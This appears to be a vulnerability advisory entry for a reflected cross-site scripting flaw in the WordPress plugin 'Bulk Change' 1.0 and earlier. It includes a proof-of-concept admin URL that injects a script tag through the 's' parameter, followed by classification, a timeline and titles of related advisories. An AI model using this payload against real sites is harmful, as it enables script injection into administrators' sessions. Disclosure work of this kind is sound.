Bulk Change <= 1.0 – Authenticated Reflected Cross-Site Scripting

Description

The Bulk Change page under Tools > Bulk Posts Change has an 's' GET parameter echoed to a text input tag value without being sanitised, leading to a cross-site scripting issue.

Proof of Concept

/wp-admin/tools.php?page=bulk-change%2Fbulk-change.php&per_page=10&dosearch=Search+...&change_posttype&bctp_action&s="><script>alert(`XSS`)</script>

Affects Plugins

bulk-change

No known fix

References

URL

https://zeroaptitude.com/misha/wordpress-plugin-bug-hunting-part-2/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

CVSS

9.6 (critical)

Miscellaneous

Original Researcher

ZeroAptitude

Verified

WPVDB ID

56ca3705-e363-4a4d-9f38-71affe1cfc65

Timeline

Publicly Published

2020-08-31 (about 5 years ago)

Added

2020-08-31 (about 5 years ago)

Last Updated

2020-09-01 (about 5 years ago)

Other

Published

Title

Published

2023-06-02

Title

Page Builder by AZEXO <= 1.27.133 - Contributor+ Stored Cross-Site Scripting via shortcode

Published

2019-08-04

Title

Rencontre < 3.2 - Authenticated Stored XSS via textmail & textanniv Parameters

Published

2026-02-25

Title

Grand News <= 3.4.3 - Reflected Cross-Site Scripting

Published

2024-09-26

Title

Loops & Logic < 4.1.5 - Reflected Cross-Site Scripting

Published

2025-01-16

Title

Dezdy <= 1.0 - Reflected Cross-Site Scripting